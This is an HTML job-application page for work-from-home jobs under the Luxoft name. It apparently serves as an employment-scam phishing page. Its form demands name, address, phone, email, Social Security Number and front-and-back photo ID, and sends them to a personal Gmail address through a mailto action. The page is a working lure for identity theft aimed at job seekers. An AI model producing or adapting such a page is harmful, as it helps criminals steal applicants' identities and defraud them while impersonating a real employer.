<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Apply - Luxoft</title>
  <link rel="stylesheet" href="style.css" />
</head>
<body>
  <header>
    <nav>
      <div class="logo">Luxoft</div>
      <ul>
        <li><a href="index.html">Home</a></li>
        <li><a href="about.html">About</a></li>
        <li><a href="services.html">Services</a></li>
        <li><a href="contact.html">Contact</a></li>
        <li><a href="application.html">Apply</a></li>
      </ul>
    </nav>
  </header>
  <main>
    <section class="hero">
      <h1>Job Application</h1>
      <p>Please fill in the details below to apply for our work-from-home jobs.</p>
      <form action="mailto:luxoftorganization@gmail.com" method="post" enctype="text/plain">
        <label for="name">Name:</label><br />
        <input type="text" id="name" name="Name" required /><br /><br />
        <label for="address">Address:</label><br />
        <input type="text" id="address" name="Address" required /><br /><br />
        <label for="phone">Phone Number:</label><br />
        <input type="tel" id="phone" name="Phone" required /><br /><br />
        <label for="email">Email Address:</label><br />
        <input type="email" id="email" name="Email" required /><br /><br />
        <label for="ssn">Social Security Number (SSN):</label><br />
        <input type="text" id="ssn" name="SSN" required /><br /><br />
        <label for="photo">Photo ID (Front and Back):</label><br />
        <input type="file" id="photo" name="PhotoID" accept="image/*" required /><br /><br />
        <input type="submit" value="Submit Application" />
      </form>
    </section>
  </main>
  <footer>
    <p>&copy; 2025 Luxoft. All rights reserved.</p>
  </footer>
</body>
</html>